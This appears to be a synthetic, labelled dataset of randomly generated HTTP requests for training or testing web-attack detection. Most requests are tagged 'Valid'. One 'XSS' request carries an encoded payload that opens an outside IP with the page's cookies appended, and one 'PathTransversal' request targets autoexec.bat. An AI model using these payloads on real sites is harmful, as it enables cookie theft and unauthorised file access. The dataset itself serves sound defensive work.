GET /hCTHzx-phJ4nimfMAGnO/ctceaNnd4ti2titi/baamlaaer4vurwy/kz3whereB1vElz/aE/e6moes/t3M8hPn9/cF9F0homeLmeta3IeU/oEqUtLq6gnYG4_ftp.nsf?i1DclxaNt-lo=ILg5crgl1TnngAay&jssheuol=hLQ7bT_8&reitAlinaeh=321&UqAXstyleowNbimgt=odc&Aem1ddilfer=iwgetene%3E%3Ba%3Da3r+y%3Do&H6R5QY=kwHUQS&kD=88&t2wfbndtnhaot=r-4PDc85x&UNbodymochaJ=ahenossiwlrs&insertL0M@f=1 HTTP/1.0
Host: www.rAei.net:80
Connection: keep-alive
Accept: application/postscript, video/*, text/*;q=0.2
Accept-Charset: windows-1251, euc-cn;q=0.6, windows-874;q=0.6
Accept-Encoding: *;q=0.7
Accept-Language: AztT-b4lnauay, zrE-d;q=0.3, l3atb-nst;q=0.5, r8k-e, a1t0nw5-lv;q=0.8
Cache-Control: no-transform
Client-ip: 90.81.217.94
Cookie: uwy87ensq7vatqt=8xoioxei
Cookie2: $Version="10"
Date: Wed, 17 Aug 05 17:55:30 CET
ETag: W/"rawowBGsxwOeMNHwDQD"
Expect: shernS8
From: rdny@hctpuostk.cz
If-Modified-Since: Tue, 29 May 07 08:09:15 CET
If-Unmodified-Since: Mon, 08 Feb 10 10:49:48 CET
If-Match: "4gN5WExmjl@9aYCCz"
If-None-Match: *
If-Range: *
Max-Forwards: 36
MIME-Version: 7.2
Pragma: o='ea8fiSe'
Proxy-Authorization: Basic dGV0ZUk6ZGxpdg==
Authorization: aahT fAd7=onn2sth
Range: -299
Referer: /mrab/S9d6a.swf
TE: deflate
Trailer: Max-Forwards
User-Agent: aohe0t/8.7.5
UA-CPU: Sparc
UA-Disp: 427,601,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 523x1389
Via: 0.5 www.jdqvwl.shtml, sinsa/0.7 77.115.166.12, 7.5 www.55rutel.jpeg
Transfer-Encoding: identity
Upgrade: tigP/7.0
Warning: 737 27.95.14.86 "Soaoayayt4nrwenZO" 
X-Forwarded-For: 188.200.228.132
X-Serial-Number: 4786268
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17902
Start - Id: 25367
class: Valid
GET /dssrefceuomsueIEfes/ne9lrohchc/urJdLPRkg0MwRv5/noaacasga1c/uD7c72Xryo@q7JAeDgy.swf?axtcE1ob=sIsnctrf0aerm+r%3C&acy=4u&5YVl7EFf@=82860&io0iuoeh2h=elsm5k&eo=4&N5cPmdoo1wtEu=aVY1dfIKVq&prioc=eBj&nii=iIw&aitmrsMEe=62142&1forooenicoI=986950&rlpiT5CVT=dei HTTP/1.0
Host: 209.199.81.51
Connection: irdes5
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: compress, identity, gzip;q=0.6, compress, deflate
Accept-Language: TlleAmnz-uai88, gieta-j;q=0.9, nsek-9;q=0.7, A-nip;q=0.4, i6-a;q=0.3
Cache-Control: tT4='ee'
Client-ip: 40.205.50.161
Cookie: sa=156374500
Cookie2: $Version="1"
Date: Tue, 24 Jul 07 15:03:36 GMT
ETag: W/"CHOpfeJaTcF38M2su0"
Expect: tYps
From: iaomoX@nnxktO8Iw.org
If-Modified-Since: Thu, 07 May 09 13:23:35 GMT
If-Unmodified-Since: Thu, 15 Jul 04 19:44:45 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 05 Feb 05 02:30:42 UTC
Max-Forwards: 7
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: Basic b2FhaHVpZzpnMG5pdGhocg==
Authorization: href n8eiba=no8gf
Range: 4947-
Referer: /nrosoi/fEsefie.jpg
TE: gzip,chunked,trailers
Trailer: Authorization
User-Agent: nsme/9.9.3
UA-CPU: 68000
UA-Disp: 761,7667,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 894x439
Via: FTP/9.5 www.aMDa.shtml
Transfer-Encoding: identity
Upgrade: mAfhy/1.2, miweeu/5.9, cro/2.3, escale/8.3
Warning: 912 www.oae7p.js "tows0eecop" "Sun, 06 Nov 05 24:11:34 UTC"
X-Forwarded-For: 150.249.43.63
X-Serial-Number: 5812967
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25367
Start - Id: 30132
class: Valid
GET /tpbaiea/oIV/BSh/ettGcmIbpdiSowtei1n/pF9VdiykL/hx1pMNEYUpm2ai3A/wogiredtbh.swf? HTTP/1.1
Host: www.ooxeexmot.fr:80
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=495
Client-ip: 143.201.136.192
Cookie: aPOeaRnodeQ=c=paept%srle5;phpIHhttpVZZKLg.=eKi52;uotim=640;ldeho=168977411;tijeei=Mfis
Cookie2: $Version="029"
Date: Wed, 30 Apr 08 23:21:54 GMT
ETag: "QCTzIcasg43MjftgSC1"
Expect: 100-continue
From: iniaie@acmclk.ch
If-Modified-Since: Sun, 05 Feb 06 18:59:49 CET
If-Unmodified-Since: Sun, 25 Jun 06 21:00:58 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 19 Feb 09 08:21:38 CET
Max-Forwards: 537
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Basic aXRoZTp5aHRhb2Y=
Authorization: Basic OWhtZWpmdW06VGVua25h
Range: 85-19667
Referer: /eoweh/bict/ApFeever/tejmetHa/1ooe7sfE.exe
TE: deflate;q=0.5,trailers
Trailer: Upgrade
User-Agent: Mozilla/5.2 (X11; U; Solaris 7.5; GN-ra; rv:5.9.4) Gecko/45589911
UA-CPU: Sparc
UA-Disp: 834,9850,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 146x988
Via: FTP/4.4 www.oxse.jpg, HTTP/9.9 www.ct5zcere.png
Transfer-Encoding: phseR
Upgrade: rniar/1.5, s3cequ/3.7
Warning: 196 20.227.62.117 "yeoclsstdewnrausitue" "Mon, 21 May 07 14:22:24 UTC"
X-Forwarded-For: 46.52.217.2
X-Serial-Number: 56155
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30132
Start - Id: 35992
class: PathTransversal
PUT /a0rta/aE-f-oYGaJKZ2t.mdb? HTTP/1.0
Content-Length: 169
Content-Language: ntehesa,Ln4
Content-Encoding: gzip
Content-Location: http://as9oalyc.cz/mthririr.txt
Content-MD5: bHNmZWFkc3JsZWd0aGxlaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 26 Aug 04 12:48:27 CET
Last-Modified: Sun, 19 Aug 07 13:02:45 GMT
Host: 199.151.163.57:80
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 11.175.85.5
Cookie: e5=D3c;irww=49;GEheawl=876090;ohl5=n2/tt
Cookie2: $Version="232"
Date: Sat, 13 Feb 10 16:38:52 CET
ETag: W/"BlYWiXEeTeQyj4LLGp5t"
Expect: 100-continue
From: hacs@cltuesA.com
If-Modified-Since: Mon, 19 Nov 07 16:29:07 CET
If-Unmodified-Since: Mon, 16 Oct 06 24:17:37 CET
If-Match: "v_cwi9t0WfCQg9-Qhh"
If-None-Match: *
If-Range: Mon, 01 Dec 08 01:46:02 UTC
Max-Forwards: 9
MIME-Version: 5.1
Pragma: yiene3ai='roxtNSns'
Proxy-Authorization: Basic bmlscm5ndDpkMjh1YWE5
Authorization: Digest opaque="zhbe"
Range: 799-,4-,-692713
Referer: /hnhhm/ncsioat/rSney/srtutai/easm.pl
TE: chunked,trailers,chunked
Trailer: Accept-Encoding
User-Agent: hc0ZevA http://www.eg0stgt.gov
UA-OS: Win98
Via: HTTP/6.1 59.149.130.67, 7.8 181.30.123.181, 5aodr/6.6 124.179.236.156:9
Transfer-Encoding: ntnn
Upgrade: uUi/7.8, eeds/2.6, Myede/4.4
Warning: 420 www.esiroa.js "tdoieaa" "Wed, 03 Jan 07 09:34:59 GMT"
X-Forwarded-For: 133.228.168.254
~~~~~: ~~~~~~~~~~~~~~~~~~~~

swnl=eJdJ0.&O7scsontydpty=%h\ot&6e7lng=tide&g5ecctn=n&obneti=gs&hmmagnUdn3nn=oLr8XYqdb&tfsbwupsoeun20=n:\autoexec.bat&aylhA7aesT=la&7ghaNr=25608445&nbjgqtvbpst=r

End - Id: 35992
Start - Id: 30283
class: Valid
GET /t07.qkPv4W0wP/txjtSvarSuwtSwS/uu/FjhhcPFFyfromA/eMSj6J-/6VRJk/31Vk4samI00z/sTfimsqtrwtla/np4Yv4@xw.jpeg?ao1=sNsFnSr&dy8vfEcaitje=cuia&rcplsM9A6J=5atreiKi+ewe&ByQreplaceu2kz=1xunCF_W_1&en3bcatsafne4=oee HTTP/1.1
Host: 122.248.85.144:80
Connection: keep-alive
Accept: image/png;q=0.4, audio/x-wav, video/*
Accept-Charset: iso-8859-4;q=0.9, x-mac-chinesetrad;q=0.0, iso-8859-2, us-ascii;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 126.177.121.250
Cookie: soidlehtacs=08;annHwoslnleeElh=918112;948C6m4stylexwV=305224750;gt@CUjbgsoundncL6O=GuztcopyouxU5 e&e agroup by5vi;HwrfeLtojellwg=m(Adropc%tc' ra@N<u
Cookie2: $Version="60"
Date: Tue, 30 Jun 09 13:23:25 GMT
ETag: "qD-cIxWnIgufy6Wwdjh"
Expect: 100-continue
From: hgNhns@5tun.biz
If-Modified-Since: Fri, 08 May 09 12:17:14 UTC
If-Unmodified-Since: Mon, 06 Mar 06 03:46:19 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 09 Apr 07 08:11:25 CET
Max-Forwards: 8
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: NTLM cncyZWZybWM2WW5hbjNTZ3d0azZsMGxhaTBoN2FkaWFuTXNuM25heXN5eXc=
Range: -915389
Referer: http://www.itrz79by.de/uionn/sddhWkd/hPZmcN/yrsCw.wmn
TE: gzip,deflate;q=0.8
Trailer: Range
User-Agent: Mozilla/3.8 (X11; U; Solaris 3.8; rt-o3; rv:8.0.0) Gecko/80280813
UA-CPU: MIPS
UA-Disp: 1132,2710,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 9593x7407
Via: HTTP/9.8 www.beEtlbo.jpeg, asb/7.8 www.coef6jEa.png:59558, FTP/0.7 113.14.189.98
Transfer-Encoding: compress
Upgrade: ebeeeA/4.0, bnny5a/4.5, hdfrAb/1.2
Warning: 070 128.156.53.251 "iatatkou" "Thu, 07 Jul 05 12:51:29 CET"
X-Forwarded-For: 102.149.83.187
X-Serial-Number: 686350212460
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30283
Start - Id: 1055
class: Valid
GET /@PAz3TFPDnACvarE/soF6mby1D03VFkiWH@7/Li2ourgipzn5/nVp4Pk29f.fU8EGsqiJ/aBvTuOBlGoSE4gn/ytdiipi/luwtwmq2feo.shtml? HTTP/1.0
Host: 97.82.85.83:80
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: nq-pAhus, o0i-ogstetii;q=0.5, ststatra-aai6;q=0.8, oofp-54
Cache-Control: no-transform
Client-ip: 46.138.30.163
Cookie: pitw3eih=611669162;uduemetrchesi=ifY2envv5X0q
Cookie2: $Version="40"
Date: Sat, 16 Feb 08 17:54:53 GMT
ETag: "bJfMYYAOww_oeDEWr8h"
Expect: 100-continue
From: lSpom@es6vknOma.biz
If-Modified-Since: Fri, 08 Sep 06 07:37:41 UTC
If-Unmodified-Since: Sat, 01 Jul 06 02:11:43 CET
If-Match: "md8_DeRSJ-@bkZL"
If-None-Match: "nz988Q3S3mCiO1g"
If-Range: *
Max-Forwards: 7
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: NTLM aXRyZXNkbzRvcnhyY2VleXR0ZW1ybnNhRXplbnphaTdSNW9SYWVpYmVuNg==
Authorization: 5gae ghtioiun=1fpi0eEe
Range: 46238-
Referer: http://www.kitUi.ch/rnise/jnN8nsK/Cu7le8/Recsrs/owsvxw4d.bin
TE: deflate,trailers
Trailer: If-Modified-Since
User-Agent: osaxhhsya
UA-CPU: MIPS
UA-Disp: 037,709,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 8806x127
Via: 0.3 192.65.87.51, 2.1 www.efeksh.jpg, HTTP/3.5 173.58.216.130
Transfer-Encoding: mhfsSt; ahszD=aL1lt
Upgrade: mie/3.2, kgma/1.7, oli/9.3, oyl/8.2
Warning: 884 212.15.147.145 "eeicrU" 
X-Forwarded-For: 228.4.85.61
X-Serial-Number: 3135796940
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1055
Start - Id: 30784
class: Valid
GET /otKA@/7SkrYivh0NRJ6Kxf/lgbQ0ebtwnw@/cnAe8JEX77KNDu/il61I/sSorteFn.php3?zTahd7=mf%3D+7&lpat=https&beSiwN=sYweatdic7&igtwst0=0392750&sa9aevauitc0=ddIXX3Ny&Lcv=si9g7bpnw9 HTTP/1.0
Host: 233.51.207.125
Connection: close
Accept: */*;q=0.8
Accept-Charset: x-mac-korean;q=0.8, x-mac-ce
Accept-Encoding: deflate, gzip;q=0.6
Accept-Language: toye0-OVw
Cache-Control: max-stale=8
Client-ip: 51.254.226.212
Cookie: tettenno=N ;TlxiosMoe9gut2=ePwhenaThra;awi=6 iaa
Cookie2: $Version="87"
Date: Thu, 09 Oct 08 09:36:00 GMT
ETag: W/"BHpeDs_ATrhA0BbbBV"
Expect: vsuo
From: gEod@e1aR.org
If-Modified-Since: Fri, 29 Sep 06 02:51:01 UTC
If-Unmodified-Since: Fri, 16 Feb 07 11:38:27 GMT
If-Match: "cjbnxa-@DJSpkD-K5I-"
If-None-Match: "Q8upEQwmtSoHXvC7z3"
If-Range: Fri, 02 Jan 09 22:33:31 UTC
Max-Forwards: 36
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: ieatc4 rnrbw=hcadA
Authorization: Vtnc hdrueai=2twe
Range: -1,974962-,286481-504589
Referer: /etrwij/eiaNMau/har2i.msf
TE: gzip,deflate
Trailer: If-Match
User-Agent: Mozilla/8.5 (Windows; U; WinNT 6.1; yS-et; rv:1.7.9) Gecko/47314558
UA-CPU: 68000
UA-Disp: 346,530,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 5335x466
Via: HTTP/0.9 www.ae0ht.jpg
Transfer-Encoding: deflate
Upgrade: uIT/1.8, hdv/9.8
Warning: 732 112.144.58.134 "HhNnuq" 
X-Forwarded-For: 226.201.113.37
X-Serial-Number: 1320262556733301
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30784
Start - Id: 33316
class: Valid
POST /ejdF5F_NHe/D9Mps6-OUW/csatnqevn2inetefEeh/ceMnAmolqcse/qe9yoN6wD1z3/RsmdlhcfeE/aHI5SByWX/hgV4UWU9yIGk9OI/92aqaeaiohmehbeC.shtml? HTTP/1.1
Content-Length: 285
Content-Language: i9n,teo
Content-Encoding: deflate
Content-Location: http://www.amh1htz.de/ehEedEM5/k5gBcs/paehbta/igt84eme/e2eei0r3.bin
Content-MD5: dUFsaWU3ZWFlc2llcmVtZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 17 Jul 05 21:50:55 GMT
Last-Modified: Thu, 24 Aug 06 24:13:33 GMT
Host: www.pvcoeJtedh.biz
Connection: keep-alive
Accept: application/*, image/*;q=0.5
Accept-Charset: iso-8859-4;q=0.1, cp-950, cp-936
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 161.3.132.174
Cookie: gauoea3itaze=95;4wgetUiML0VnOIl=10656;ariatct=$tRen<ftprlusr\8;xwe9cquofseiqhf=@nv
Cookie2: $Version="3"
Date: Tue, 08 Sep 09 23:20:06 CET
ETag: W/"aYE2lX5JEkSIDDOqg1n"
Expect: 100-continue
From: rcidi8@tsUeIwinez.net
If-Modified-Since: Wed, 26 Apr 06 24:23:30 GMT
If-Unmodified-Since: Mon, 12 Oct 09 03:34:17 GMT
If-Match: "1zDCGYp_yibUi6qB"
If-None-Match: "GF1X9Zh2OQLWQ7eMXbX"
If-Range: Sat, 13 May 06 14:26:45 CET
Max-Forwards: 026
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Digest cnonce="dw2tl"
Authorization: Basic b2VhaWRsOm51YWU=
Range: 6-,39-,43-
Referer: http://www.7idodu.biz/Cgwe/0jqer/2mwha/0hawHob.pdf
TE: deflate
Trailer: User-Agent
User-Agent: Mozilla/7.3 (Windows; U; Win98 4.4; Sn-tt; rv:7.8.4) Gecko/06665063
UA-CPU: StrongARM
UA-Disp: 6993,500,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 8624x050
Via: 4.3 40.153.211.177
Transfer-Encoding: dThN
Upgrade: uzt/1.1
Warning: 225 8.156.160.60 "gIs0jtndnqerEqatp" 
X-Forwarded-For: 178.187.50.135
X-Serial-Number: 0152734309
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eoebtEuuergt=nneagewhereCc&nehezs=itoUn&AV2PZDXNrw=eupdatec&Mtmp4SrZ=a8xxIpFnW&thoedblegi=6YNP-XsKybps&Qexecku=0VJ0hB&hsnnotlelntr=5&d8arsgroXtin=ekS7BNWT&z9htnImnheslt=3&iumo6agiYeyz2ai=6&sBuae5HeatTA= ih&i'pq8-6et3> &a5=  aS&echo3odbgphttp=oHoh9rtta&Sy1TB-hTfrom=aEhrtwrNcisaOn

End - Id: 33316
Start - Id: 11120
class: Valid
GET /rtjwnt3ne/hFN2PbJ/risehgashewgourPc/sR7rxaShY2QGX@nmkmM/lletqsIee/qKZP/83libQn/g_pIScnV/kn53eothei6ueoo1aweu/cTc.6aULBb/8uPm142trxseuniie/n0K_h7j.ZIWsh4qNHKho.php3?n3O68rp=%25s&nrdseiehn=vl%28c1bwinnth8aegrs&WE_openN=%3AN&An5naxc=baDws HTTP/1.1
Host: 58.111.176.13:80
Connection: keep-alive
Accept: image/*;q=0.4, audio/*
Accept-Charset: x-mac-greek, x-mac-arabic, windows-1250;q=0.0, iso-8859-8-i;q=0.6
Accept-Encoding: 
Accept-Language: oe6e-oekr, imEy-eieieyrx, lae8vxo-Eei13;q=0.6, rf-0f
Cache-Control: no-transform
Client-ip: 199.206.86.40
Cookie: lZXK= aWdee53-;bHe1aanny=3R42vxG;reo8q6hht=Ninsertssbpt;locationR27NCQ.Go='
Cookie2: $Version="6"
Date: Sat, 21 Feb 04 20:48:24 UTC
ETag: "KxGpFDZ.Q1ggkZou0DQ"
Expect: 100-continue
From: lQbqTa@Erdtpio.net
If-Modified-Since: Sun, 29 Jul 07 07:34:29 GMT
If-Unmodified-Since: Tue, 05 Oct 04 07:27:49 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 08 Sep 08 09:55:43 GMT
Max-Forwards: 82
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Oemowf oxlae=eie4ii
Authorization: tnreqm evaehss=sbrr0
Range: -442015,-0464
Referer: http://xm8et.ch/eukasHn/jiHnteht/thtn/Duge/ed7t6yrn.rar
TE: trailers,deflate
Trailer: Transfer-Encoding
User-Agent: t0rteEBrsrn
UA-CPU: 68000
UA-Disp: 8419,120,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 4624x463
Via: 7.8 91.38.111.145, FTP/9.0 220.217.236.31:7
Transfer-Encoding: compress
Upgrade: r8ef/8.8, amlo/0.9
Warning: 038 253.37.154.187 "upnl" "Tue, 05 May 09 05:09:44 CET"
X-Forwarded-For: 93.178.246.86
X-Serial-Number: 96723
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11120
Start - Id: 16936
class: Valid
GET /5hT15BB7h4/1EJXD6LgjBOj_W4/tQpZxHKao5pP8izZ/hwy.jpg? HTTP/1.0
Host: 255.31.153.235
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: deflate;q=0.0, compress;q=0.0
Accept-Language: *;q=0.4
Cache-Control: min-fresh=4646
Client-ip: 65.159.241.124
Cookie: Oeoa4h0tefqorlt=orhhro
Cookie2: $Version="97"
Date: Sat, 19 Jun 04 21:01:00 UTC
ETag: W/"__pMTKK2UI_gOlrMd"
Expect: 100-continue
From: 1zejnwe@p3nAt.it
If-Modified-Since: Mon, 04 Feb 08 24:54:52 CET
If-Unmodified-Since: Wed, 31 Aug 05 21:50:55 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 4.7
Pragma: 6ekgcea0='E'
Proxy-Authorization: ilera ftnruhuo=doFpte
Authorization: iinrd tcuftvaz=eSeeg
Range: -648885,06-7154
Referer: /meediosh/psed/eihh.html
TE: trailers,gzip;q=0.0
Trailer: Accept-Language
User-Agent: fwxuFxkf1x http://www.fegWrdzn.cz
UA-CPU: 68000
UA-Disp: 035,022,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 581x0277
Via: 9.9 www.ueidisa.jpg:44, FTP/6.3 86.71.79.166:7, 6.3 www.2deCe.html:7
Transfer-Encoding: esr1i
Upgrade: 4uhodl/9.5
Warning: 657 48.208.205.0 "stewwll5imhtepl" 
X-Forwarded-For: 234.74.157.132
X-Serial-Number: 00550
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16936
Start - Id: 2660
class: Valid
GET /bhneGod1.jpeg?1gbqrye=mselectseooca3tnr&tgN=Pnwn6t9fm8sl&heakjdidnr2e=twd&nEuI3ei=yelsge&siomefIheeyn7=mailnsdt&dwchyvzb=b%5Dnf1oate HTTP/1.1
Host: 163.156.34.99
Connection: yprt
Accept: */*
Accept-Charset: windows-1250, iso-8859-2;q=0.7
Accept-Encoding: 
Accept-Language: Iveanydt-a;q=0.8, lemi-oyicS, Ug-ta1
Cache-Control: max-stale
Client-ip: 221.99.3.21
Cookie: Uoaoyehueosqon=shlo;.O4O=ec;ehbse=lw2n0&i7eo
Cookie2: $Version="3"
Date: Wed, 10 Sep 08 24:29:36 UTC
ETag: W/"YgfCl574zFZDDyBiItIN"
Expect: hvth
From: ovamHuqy@MlywzI.fr
If-Modified-Since: Wed, 03 Jan 07 19:09:29 GMT
If-Unmodified-Since: Fri, 27 May 05 05:30:39 GMT
If-Match: "llR3YIbSUj4KQkrEV2X"
If-None-Match: "dwUQ.hFt3R6oS5c"
If-Range: *
Max-Forwards: 5
MIME-Version: 0.5
Pragma: b='ibe'
Proxy-Authorization: Digest realm
Authorization: dOywk sie2abod=hgka
Range: 6173-075
Referer: http://oacfTa.org/aesem8ga/vnerh/ait3fyek/sdjmsO/kh7s.jsp
TE: trailers
Trailer: Accept-Charset
User-Agent: tssh/2.5.6.3
UA-CPU: x86
UA-Disp: 5435,722,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 834x080
Via: HTTP/3.4 www.feleGsl.tiff, 4.9 118.247.30.11
Transfer-Encoding: gzip
Upgrade: dubal/9.7, rce/1.2
Warning: 692 www.6ine.png "xa9d" "Fri, 03 Apr 09 06:38:55 UTC"
X-Forwarded-For: 196.188.242.124
X-Serial-Number: 8136074594585
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2660
Start - Id: 1682
class: Valid
GET /r6@udivfY5/yk_@8Hg-G8J9fQ.wQ/ydfedxcaOkusi/sjF4mxHG-7HcGN/glBihwhieymhtAnnsdhg/roiohoqltg94.html?bWUXc7boot.iniz5=%29update%5Bgimgg%2FbetweenTo%2F2m&sdnnta9lcsgv8se=t8xn&ndfoo5a=staptyaxe1esu5a&esder4IebOTitaq=Ex%5Dfinwlnikste&esueytslgThtw=040589&hioiaicho5=tan60sreHOsuwrej&echhahsxpxt=cPYi3Rj-nJ&qAWTPobject=edmltb0ie0mn&Lhioaeye=uyWTatIHS&scsyza2rngduec=80018378&rtdiOoi=%28tep%2Bh1a&wum9lteArta=24&ro=64217&tcec8Bu=875 HTTP/1.0
Host: www.9tRuee.it:80
Connection: soat7oo
Accept: text/xml;q=0.1, video/mpeg;q=0.0, audio/x-wav
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=4
Client-ip: 77.199.112.25
Cookie: nsfaeyea=60Di4h;uosuk=lju;ajlelrisussn5=mvar\pa
Cookie2: $Version="3"
Date: Thu, 09 Nov 06 19:15:06 GMT
ETag: "yU2fiKRYvx4Fvdtgokxp"
Expect: d3edbu=gn7fat;wdRh=eoMnle
From: iNaNl@nioce.ch
If-Modified-Since: Sat, 16 Oct 04 15:24:46 CET
If-Unmodified-Since: Sat, 11 Aug 07 13:47:25 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 29 Jul 08 02:26:44 UTC
Max-Forwards: 8035
MIME-Version: 3.5
Pragma: dH='n'
Proxy-Authorization: Digest username="o3aarj"
Authorization: NTLM bnRpb2hhaU91eGFoaWlvc3pmYXNlcmU0YWkyem9lYXQ=
Range: 73-
Referer: /lttwdrpb.cgi
TE: deflate,gzip;q=0.7,gzip;q=0.1
Trailer: If-None-Match
User-Agent: Mozilla/0.9 (Windows; U; Win98 6.3; hh-es; rv:2.9.3) Gecko/60837060
UA-CPU: StrongARM
UA-Disp: 1503,019,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3865x207
Via: FTP/6.2 www.wnHe4s.jpeg, 6.0 www.wnor.png, wntr/1.0 236.80.138.132
Transfer-Encoding: identity
Upgrade: edsh/1.1, 0e3eaA/2.7, 9eisMe/2.7
Warning: 541 www.tsaq.css "udtierkfde3nlrocns" "Mon, 14 May 07 03:02:21 CET"
X-Forwarded-For: 111.79.187.206
X-Serial-Number: 3355979393710804862
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1682
Start - Id: 47208
class: XSS
GET /ri1BZ/Mimg4dFrID7ZQ59x/im-qOK/ognviukruHha/sVFx5VOYgZeEhWL74k55/w7q6Dyw/tU1qQlx7O/n8Gb-/deleteHfoZVnodey/nhfixsdmdEem8pnn.asmx?3gc4jiepo=tetioatT70imnl&PArlue=iyy%25fw&8ro=%3Clink++++rel+%3D+++%22stylesheet+%22+++++href++%3D++++%22+++++javascript%3A++%5Bwindow.open%28%27http%3A%2F%2F137.8.172.194%2Fndniat.nsf%27%2Bdocument.cookie%29%3B%5D++++++%22+%3E&nngbto=4t&nTrhg1=436712&pneEetloseelo=332540276&eouoi=nIXfC HTTP/1.0
Host: 196.123.68.209
Connection: close
Accept: */*
Accept-Charset: windows-1251, iso-8859-7, x-mac-turkish;q=0.2, iso-2022-jp, x-mac-arabic;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=9
Client-ip: 63.161.16.102
Cookie: wonea5=nnf\+ne:\/frs 
Cookie2: $Version="8"
Date: Tue, 05 Dec 06 15:55:53 UTC
ETag: "owjdohDQxUXpeBzPAh5"
Expect: 100-continue
From: sljrhob@lQr5hecoet.de
If-Modified-Since: Mon, 19 Jul 04 19:37:23 CET
If-Unmodified-Since: Sat, 26 Jan 08 08:25:07 GMT
If-Match: "zjam0N@.5UF1pCJ"
If-None-Match: *
If-Range: Sat, 31 Dec 05 17:59:14 GMT
Max-Forwards: 4253
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Basic bW5kZ2VrbmU6dWVja2FoaXA=
Authorization: NTLM c242dHJOdDVzYThpUmVtZ253THJzd2Rpb25oeWdoTm5ybQ==
Range: 8-,46-,-554862
Referer: /eurs/Ctns5/7blFF/eoabg8re.swf
TE: deflate,trailers
Trailer: If-Range
User-Agent: Mozilla/0.1 (Windows; U; WinNT 5.5; ok-si; rv:4.9.8) Gecko/13372127
UA-CPU: 68000
UA-Disp: 4828,524,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 286x017
Via: 2.6 www.4geu.htm, 1.3 214.63.9.22
Transfer-Encoding: compress
Upgrade: urd/1.0
Warning: 023 176.209.137.215 "wrgDroclerrobjmfp3o" "Thu, 19 Jun 08 19:41:05 GMT"
X-Forwarded-For: 42.248.51.9
X-Serial-Number: 04739435468972088
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47208
Start - Id: 1854
class: Valid
GET /sOst7Il8rerYtto/nS/faetudcteGm/eKn21/rB2@EfDPx8K9EoLo.htm? HTTP/1.1
Host: 86.171.252.111:71040
Connection: Reea
Accept: video/quicktime, video/*
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.5
Accept-Language: eeg7oetr-ucgt, iodeu-ntoh
Cache-Control: no-store
Client-ip: 227.34.123.18
Cookie: bbrasw1=1;Q1y2updateJEd7P=lQc0fs@ZcFOI;ena7enc=94630664;ye4=9798;ori=629108
Cookie2: $Version="36"
Date: Fri, 03 Apr 09 05:58:17 UTC
ETag: "@PZ9hT2@mrfZ-kcWb"
Expect: 100-continue
From: utOro@brnnglI.fr
If-Modified-Since: Wed, 20 Jul 05 09:31:20 GMT
If-Unmodified-Since: Fri, 02 May 08 03:49:35 UTC
If-Match: "6mBYZSbjCV7uw@K-"
If-None-Match: "tyg9eLdk-chR94vJdGk_"
If-Range: *
Max-Forwards: 5494
